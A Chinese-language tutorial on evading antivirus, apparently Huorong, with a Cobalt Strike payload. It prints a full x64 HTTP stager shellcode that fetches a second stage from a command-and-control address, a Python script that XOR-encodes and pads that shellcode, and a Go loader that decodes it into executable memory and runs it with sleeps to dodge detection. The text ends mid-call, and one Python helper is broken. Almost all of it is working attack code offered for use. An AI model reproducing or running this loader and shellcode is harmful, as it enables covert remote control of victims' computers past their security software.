Go/Python 免杀

简介: Go/Python 免杀

CS免杀--绕火绒

首先 cs 生成c语言的shellcode


* length: 923 bytes */
unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xb8\x22\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x59\x4b\x6c\x4d\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x29\x0d\x0a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x30\x2e\x30\x2e\x30\x2e\x31\x30\x00\x00\x00\x00\x00";

python 加密shellcode

def xor(shellcode, key):
    new_shellcode = ""
    key_len = len(key)
    # 对shellcode的每一位进行xor亦或处理
    for i in range(0, len(shellcode)):
        s = ord(shellcode[i])
        p = ord((key[i % key_len]))
        s = s ^ p  # 与p异或,p就是key中的字符之一
        s = chr(s)
        new_shellcode += s
    return new_shellcode
def random_decode(shellcode):
    j = 0
    new_shellcode = ""
    for i in range(0,len(shellcode)):
        if i % 2 == 0:
            new_shellcode[i] = shellcode[j]
            j += 1
    return new_shellcode
def add_random_code(shellcode, key):
    new_shellcode = ""
    key_len = len(key)
    # 每个字节后面添加随机一个字节,随机字符来源于key
    for i in range(0, len(shellcode)):
        #print(ord(shellcode[i]))
        new_shellcode += shellcode[i]
        # print("&"+hex(ord(new_shellcode[i])))
        new_shellcode += key[i % key_len]
        #print(i % key_len)
    return new_shellcode
# 将shellcode打印输出
def str_to_hex(shellcode):
    raw = ""
    for i in range(0, len(shellcode)):
        s = hex(ord(shellcode[i])).replace("0x",',0x')
        raw = raw + s
    return raw
if __name__ == '__main__':
    shellcode = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x20\x03\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x72\x6c\x34\x4b\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4e\x50\x30\x39\x3b\x20\x4e\x50\x30\x39\x3b\x20\x4d\x41\x41\x55\x29\x0d\x0a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x30\x2e\x30\x2e\x30\x2e\x31\x30\x00\x00\x00\x00\x00"
    # 这是异或和增加随机字符使用的key
    key = "iqe"
    print(shellcode[0])
    print(len(shellcode))
    # 首先对shellcode进行异或处理
    shellcode = xor(shellcode, key)
    print(len(shellcode))
    # 然后在shellcode中增加随机字符
    shellcode = add_random_code(shellcode, key)
    # 将shellcode打印出来
    print(str_to_hex(shellcode))

加密shellcode后,再使用go语言加载混淆后的shellcode,先解密再执行。

package main
import (
"fmt"
"syscall"
"time"
"unsafe"
)
const (
  MEM_COMMIT             = 0x1000
  MEM_RESERVE            = 0x2000
  PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
)
var (
  kernel32      = syscall.MustLoadDLL("kernel32.dll")
  ntdll         = syscall.MustLoadDLL("ntdll.dll")
  VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
  RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func main() {
  mix_shellcode := []byte{0x95,0x69,0x39,0x71,0xe6,0x65,0x8d,0x69,0x81,0x71,0x8d,0x65,0xa1,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x30,0x71,0x34,0x65,0x28,0x69,0x21,0x71,0x37,0x65,0x38,0x69,0x27,0x71,0x2d,0x65,0x58,0x69,0xa3,0x71,0x0,0x65,0x21,0x69,0xfa,0x71,0x37,0x65,0x9,0x69,0x39,0x71,0xee,0x65,0x3b,0x69,0x69,0x71,0x2d,0x65,0xe2,0x69,0x23,0x71,0x45,0x65,0x21,0x69,0xfa,0x71,0x17,0x65,0x39,0x69,0x39,0x71,0x6a,0x65,0xde,0x69,0x3b,0x71,0x2f,0x65,0x24,0x69,0x40,0x71,0xac,0x65,0x21,0x69,0x40,0x71,0xa5,0x65,0xc5,0x69,0x4d,0x71,0x4,0x65,0x15,0x69,0x73,0x71,0x49,0x65,0x49,0x69,0x30,0x71,0xa4,0x65,0xa0,0x69,0x7c,0x71,0x24,0x65,0x68,0x69,0xb0,0x71,0x87,0x65,0x84,0x69,0x23,0x71,0x24,0x65,0x38,0x69,0x39,0x71,0xee,0x65,0x3b,0x69,0x51,0x71,0xee,0x65,0x2b,0x69,0x4d,0x71,0x2d,0x65,0x68,0x69,0xa1,0x71,0x3,0x65,0xe8,0x69,0x9,0x71,0x7d,0x65,0x62,0x69,0x73,0x71,0x10,0x65,0x1b,0x69,0xfa,0x71,0xe5,0x65,0xe1,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x39,0x71,0xe0,0x65,0xa9,0x69,0x5,0x71,0x2,0x65,0x21,0x69,0x70,0x71,0xb5,0x65,0x39,0x69,0xfa,0x71,0x2d,0x65,0x71,0x69,0x35,0x71,0xee,0x65,0x29,0x69,0x51,0x71,0x2c,0x65,0x68,0x69,0xa1,0x71,0x86,0x65,0x3f,0x69,0x39,0x71,0x9a,0x65,0xa0,0x69,0x30,0x71,0xee,0x65,0x5d,0x69,0xf9,0x71,0x2d,0x65,0x68,0x69,0xa7,0x71,0x28,0x65,0x58,0x69,0xb8,0x71,0x2d,0x65,0x58,0x69,0xb1,0x71,0xc9,0x65,0x28,0x69,0xb0,0x71,0xac,0x65,0x64,0x69,0x30,0x71,0x64,0x65,0xa8,0x69,0x49,0x71,0x85,0x65,0x1c,0x69,0x80,0x71,0x29,0x65,0x6a,0x69,0x3d,0x71,0x41,0x65,0x61,0x69,0x34,0x71,0x5c,0x65,0xb8,0x69,0x4,0x71,0xbd,0x65,0x31,0x69,0x35,0x71,0xee,0x65,0x29,0x69,0x55,0x71,0x2c,0x65,0x68,0x69,0xa1,0x71,0x3,0x65,0x28,0x69,0xfa,0x71,0x69,0x65,0x21,0x69,0x35,0x71,0xee,0x65,0x29,0x69,0x6d,0x71,0x2c,0x65,0x68,0x69,0xa1,0x71,0x24,0x65,0xe2,0x69,0x75,0x71,0xed,0x65,0x21,0x69,0x70,0x71,0xb5,0x65,0x28,0x69,0x29,0x71,0x24,0x65,0x31,0x69,0x2f,0x71,0x3c,0x65,0x33,0x69,0x30,0x71,0x3d,0x65,0x28,0x69,0x28,0x71,0x24,0x65,0x33,0x69,0x39,0x71,0xe6,0x65,0x85,0x69,0x51,0x71,0x24,0x65,0x3b,0x69,0x8e,0x71,0x85,0x65,0x31,0x69,0x30,0x71,0x3c,0x65,0x33,0x69,0x39,0x71,0xee,0x65,0x7b,0x69,0x98,0x71,0x2a,0x65,0x96,0x69,0x8e,0x71,0x9a,0x65,0x34,0x69,0x1b,0x71,0x65,0x65,0x20,0x69,0xcf,0x71,0x12,0x65,0x0,0x69,0x1f,0x71,0xc,0x65,0x7,0x69,0x14,0x71,0x11,0x65,0x69,0x69,0x30,0x71,0x33,0x65,0x20,0x69,0xf8,0x71,0x83,0x65,0x25,0x69,0xf8,0x71,0x94,0x65,0x28,0x69,0xcb,0x71,0x29,0x65,0x1e,0x69,0x57,0x71,0x62,0x65,0x96,0x69,0xa4,0x71,0x2d,0x65,0x58,0x69,0xb8,0x71,0x2d,0x65,0x58,0x69,0xa3,0x71,0x28,0x65,0x58,0x69,0xb1,0x71,0x28,0x65,0x58,0x69,0xb8,0x71,0x24,0x65,0x39,0x69,0x30,0x71,0x35,0x65,0x28,0x69,0xcb,0x71,0x5f,0x65,0x3f,0x69,0x8,0x71,0xc2,0x65,0x96,0x69,0xa4,0x71,0x8e,0x65,0x1a,0x69,0x2b,0x71,0x2d,0x65,0xe0,0x69,0xb0,0x71,0x24,0x65,0xd1,0x69,0x51,0x71,0x66,0x65,0x69,0x69,0x71,0x71,0x28,0x65,0x58,0x69,0xb8,0x71,0x24,0x65,0x38,0x69,0x30,0x71,0x34,0x65,0x3,0x69,0x72,0x71,0x24,0x65,0x38,0x69,0x30,0x71,0xdf,0x65,0x3e,0x69,0xf8,0x71,0xfa,0x65,0xaf,0x69,0x8e,0x71,0xb0,0x65,0x82,0x69,0x28,0x71,0x3e,0x65,0x21,0x69,0xf8,0x71,0xa4,0x65,0x21,0x69,0x40,0x71,0xb7,0x65,0x20,0x69,0xf8,0x71,0xbd,0x65,0x24,0x69,0x40,0x71,0xac,0x65,0x3b,0x69,0x19,0x71,0x65,0x65,0x6b,0x69,0x31,0x71,0xe1,0x65,0x3b,0x69,0x23,0x71,0x24,0x65,0xd3,0x69,0x9a,0x71,0x30,0x65,0x47,0x69,0x4a,0x71,0x9a,0x65,0xbc,0x69,0x39,0x71,0xec,0x65,0xaf,0x69,0x39,0x71,0xe6,0x65,0xaa,0x69,0x21,0x71,0xf,0x65,0x63,0x69,0x2e,0x71,0x2d,0x65,0xe0,0x69,0x80,0x71,0x2d,0x65,0xe0,0x69,0xab,0x71,0x2c,0x65,0xae,0x69,0xb1,0x71,0x9a,0x65,0x96,0x69,0x8e,0x71,0x9a,0x65,0x24,0x69,0x40,0x71,0xac,0x65,0x3b,0x69,0x23,0x71,0x24,0x65,0xd3,0x69,0x5c,0x71,0x63,0x65,0x71,0x69,0xa,0x71,0x9a,0x65,0xbc,0x69,0xf4,0x71,0xa5,0x65,0x66,0x69,0xf4,0x71,0xf8,0x65,0x68,0x69,0x71,0x71,0x65,0x65,0x21,0x69,0x8e,0x71,0xaa,0x65,0x66,0x69,0xf5,0x71,0xe9,0x65,0x68,0x69,0x71,0x71,0x65,0x65,0x82,0x69,0xa2,0x71,0x8c,0x65,0x8d,0x69,0x70,0x71,0x65,0x65,0x69,0x69,0x99,0x71,0xc7,0x65,0x96,0x69,0x8e,0x71,0x9a,0x65,0x46,0x69,0x3,0x71,0x9,0x65,0x5d,0x69,0x3a,0x71,0x65,0x65,0x5c,0x69,0x3e,0x71,0x44,0x65,0x39,0x69,0x54,0x71,0x25,0x65,0x28,0x69,0x21,0x71,0x3e,0x65,0x5d,0x69,0x2d,0x71,0x35,0x65,0x33,0x69,0x29,0x71,0x50,0x65,0x5d,0x69,0x59,0x71,0x35,0x65,0x37,0x69,0x58,0x71,0x52,0x65,0x2a,0x69,0x32,0x71,0x4c,0x65,0x5e,0x69,0xc,0x71,0x41,0x65,0x2c,0x69,0x38,0x71,0x26,0x65,0x28,0x69,0x23,0x71,0x48,0x65,0x3a,0x69,0x25,0x71,0x24,0x65,0x27,0x69,0x35,0x71,0x24,0x65,0x3b,0x69,0x35,0x71,0x48,0x65,0x28,0x69,0x3f,0x71,0x31,0x65,0x20,0x69,0x27,0x71,0x2c,0x65,0x3b,0x69,0x24,0x71,0x36,0x65,0x44,0x69,0x25,0x71,0x20,0x65,0x3a,0x69,0x25,0x71,0x48,0x65,0x2f,0x69,0x38,0x71,0x29,0x65,0x2c,0x69,0x50,0x71,0x41,0x65,0x21,0x69,0x5a,0x71,0x2d,0x65,0x43,0x69,0x71,0x71,0x50,0x65,0x26,0x69,0x50,0x71,0x35,0x65,0x4c,0x69,0x71,0x71,0x30,0x65,0x1a,0x69,0x14,0x71,0x17,0x65,0x44,0x69,0x30,0x71,0x2,0x65,0xc,0x69,0x1f,0x71,0x11,0x65,0x53,0x69,0x51,0x71,0x28,0x65,0x6,0x69,0xb,0x71,0xc,0x65,0x5,0x69,0x1d,0x71,0x4,0x65,0x46,0x69,0x44,0x71,0x4b,0x65,0x59,0x69,0x51,0x71,0x4d,0x65,0xa,0x69,0x1e,0x71,0x8,0x65,0x19,0x69,0x10,0x71,0x11,0x65,0x0,0x69,0x13,0x71,0x9,0x65,0xc,0x69,0x4a,0x71,0x45,0x65,0x24,0x69,0x22,0x71,0x2c,0x65,0x2c,0x69,0x51,0x71,0x5c,0x65,0x47,0x69,0x41,0x71,0x5e,0x65,0x49,0x69,0x26,0x71,0xc,0x65,0x7,0x69,0x15,0x71,0xa,0x65,0x1e,0x69,0x2,0x71,0x45,0x65,0x27,0x69,0x25,0x71,0x45,0x65,0x5f,0x69,0x5f,0x71,0x54,0x65,0x52,0x69,0x51,0x71,0x32,0x65,0x26,0x69,0x26,0x71,0x53,0x65,0x5d,0x69,0x4a,0x71,0x45,0x65,0x3d,0x69,0x3,0x71,0xc,0x65,0xd,0x69,0x14,0x71,0xb,0x65,0x1d,0x69,0x5e,0x71,0x50,0x65,0x47,0x69,0x41,0x71,0x5e,0x65,0x49,0x69,0x3f,0x71,0x35,0x65,0x59,0x69,0x48,0x71,0x5e,0x65,0x49,0x69,0x3f,0x71,0x35,0x65,0x59,0x69,0x48,0x71,0x5e,0x65,0x49,0x69,0x3c,0x71,0x24,0x65,0x28,0x69,0x24,0x71,0x4c,0x65,0x64,0x69,0x7b,0x71,0x65,0x65,0x5c,0x69,0x3e,0x71,0x44,0x65,0x39,0x69,0x54,0x71,0x25,0x65,0x28,0x69,0x21,0x71,0x3e,0x65,0x5d,0x69,0x2d,0x71,0x35,0x65,0x33,0x69,0x29,0x71,0x50,0x65,0x5d,0x69,0x59,0x71,0x35,0x65,0x37,0x69,0x58,0x71,0x52,0x65,0x2a,0x69,0x32,0x71,0x4c,0x65,0x5e,0x69,0xc,0x71,0x41,0x65,0x2c,0x69,0x38,0x71,0x26,0x65,0x28,0x69,0x23,0x71,0x48,0x65,0x3a,0x69,0x25,0x71,0x24,0x65,0x27,0x69,0x35,0x71,0x24,0x65,0x3b,0x69,0x35,0x71,0x48,0x65,0x28,0x69,0x3f,0x71,0x31,0x65,0x20,0x69,0x27,0x71,0x2c,0x65,0x3b,0x69,0x24,0x71,0x36,0x65,0x44,0x69,0x25,0x71,0x20,0x65,0x3a,0x69,0x25,0x71,0x48,0x65,0x2f,0x69,0x38,0x71,0x29,0x65,0x2c,0x69,0x50,0x71,0x41,0x65,0x21,0x69,0x5a,0x71,0x2d,0x65,0x43,0x69,0x71,0x71,0x50,0x65,0x26,0x69,0x50,0x71,0x35,0x65,0x4c,0x69,0x31,0x71,0x24,0x65,0x39,0x69,0x2a,0x71,0x51,0x65,0x35,0x69,0x21,0x71,0x3f,0x65,0x31,0x69,0x44,0x71,0x51,0x65,0x41,0x69,0x21,0x71,0x3b,0x65,0x40,0x69,0x46,0x71,0x26,0x65,0x2a,0x69,0x58,0x71,0x52,0x65,0x14,0x69,0x55,0x71,0x20,0x65,0x20,0x69,0x32,0x71,0x24,0x65,0x3b,0x69,0x5c,0x71,0x36,0x65,0x3d,0x69,0x30,0x71,0x2b,0x65,0x2d,0x69,0x30,0x71,0x37,0x65,0x2d,0x69,0x5c,0x71,0x24,0x65,0x27,0x69,0x25,0x71,0x2c,0x65,0x3f,0x69,0x38,0x71,0x37,0x65,0x3c,0x69,0x22,0x71,0x48,0x65,0x3d,0x69,0x34,0x71,0x36,0x65,0x3d,0x69,0x5c,0x71,0x23,0x65,0x20,0x69,0x3d,0x71,0x20,0x65,0x48,0x69,0x55,0x71,0x2d,0x65,0x42,0x69,0x39,0x71,0x4f,0x65,0x69,0x69,0x44,0x71,0x2a,0x65,0x48,0x69,0x21,0x71,0x40,0x65,0x29,0x69,0x30,0x71,0x35,0x65,0x32,0x69,0x45,0x71,0x39,0x65,0x39,0x69,0x2b,0x71,0x3d,0x65,0x5c,0x69,0x45,0x71,0x4d,0x65,0x39,0x69,0x2f,0x71,0x4c,0x65,0x5e,0x69,0x32,0x71,0x26,0x65,0x40,0x69,0x46,0x71,0x18,0x65,0x4d,0x69,0x34,0x71,0x2c,0x65,0x2a,0x69,0x30,0x71,0x37,0x65,0x44,0x69,0x22,0x71,0x31,0x65,0x28,0x69,0x3f,0x71,0x21,0x65,0x28,0x69,0x23,0x71,0x21,0x65,0x44,0x69,0x30,0x71,0x2b,0x65,0x3d,0x69,0x38,0x71,0x33,0x65,0x20,0x69,0x23,0x71,0x30,0x65,0x3a,0x69,0x5c,0x71,0x31,0x65,0x2c,0x69,0x22,0x71,0x31,0x65,0x44,0x69,0x37,0x71,0x2c,0x65,0x25,0x69,0x34,0x71,0x44,0x65,0x4d,0x69,0x39,0x71,0x65,0x65,0x28,0x69,0xcf,0x71,0x95,0x65,0xdc,0x69,0xd3,0x71,0x33,0x65,0x96,0x69,0xa4,0x71,0x2d,0x65,0x58,0x69,0xb8,0x71,0xdf,0x65,0x69,0x69,0x71,0x71,0x25,0x65,0x69,0x69,0x30,0x71,0xdd,0x65,0x69,0x69,0x61,0x71,0x65,0x65,0x69,0x69,0x30,0x71,0xdc,0x65,0x29,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x30,0x71,0xdf,0x65,0x31,0x69,0xd5,0x71,0x36,0x65,0x8c,0x69,0x8e,0x71,0xb0,0x65,0x21,0x69,0xe2,0x71,0x36,0x65,0x3a,0x69,0x39,0x71,0xec,0x65,0x8e,0x69,0x39,0x71,0xec,0x65,0x98,0x69,0x39,0x71,0xec,0x65,0xb3,0x69,0x30,0x71,0xdd,0x65,0x69,0x69,0x51,0x71,0x65,0x65,0x69,0x69,0x38,0x71,0xec,0x65,0x90,0x69,0x30,0x71,0xdf,0x65,0x7b,0x69,0xe7,0x71,0xec,0x65,0x8b,0x69,0x8e,0x71,0xb0,0x65,0x21,0x69,0xf2,0x71,0xa1,0x65,0x49,0x69,0xf4,0x71,0xa5,0x65,0x1d,0x69,0xc7,0x71,0x3,0x65,0xe2,0x69,0x76,0x71,0x2d,0x65,0x68,0x69,0xb2,0x71,0xe0,0x65,0xa9,0x69,0x4,0x71,0xb2,0x65,0x31,0x69,0x29,0x71,0x3d,0x65,0x21,0x69,0x74,0x71,0x65,0x65,0x69,0x69,0x71,0x71,0x65,0x65,0x39,0x69,0xb2,0x71,0x8d,0x65,0xf6,0x69,0x8c,0x71,0x9a,0x65,0x96,0x69,0x40,0x71,0x55,0x65,0x47,0x69,0x41,0x71,0x4b,0x65,0x59,0x69,0x5f,0x71,0x54,0x65,0x59,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x71,0x71,0x65,0x65}
  var ttyolller []byte
  key := []byte("iqe")
  var key_size = len(key)
  var shellcode_final []byte
  var j = 0
  time.Sleep(2)
  // 去除垃圾代码
  fmt.Print(len(mix_shellcode))
  for i := 0; i < len(mix_shellcode); i++ {
    if (i % 2 == 0) {
      shellcode_final = append(shellcode_final,mix_shellcode[i])
      j += 1
    }
  }
  time.Sleep(3)
  fmt.Print(shellcode_final)
  // 解密异或
  for i := 0; i < len(shellcode_final); i++ {
    ttyolller = append(ttyolller, shellcode_final[i]^key[i % key_size])
  }
  time.Sleep(3)
  addr, _, err := VirtualAlloc.Call(0, uintptr(len(ttyolller)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  if err != nil && err.Error() != "The operation completed successfully." {
    syscall.Exit(0)
  }
  time.Sleep(3)
  _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&ttyolller[0])), uintptr(len(ttyolller)))
  if err != nil && err.Error() != "The operation completed successfully." {
    syscall.Exit(0)
  }
  syscall.Syscall(addr, 0, 0,

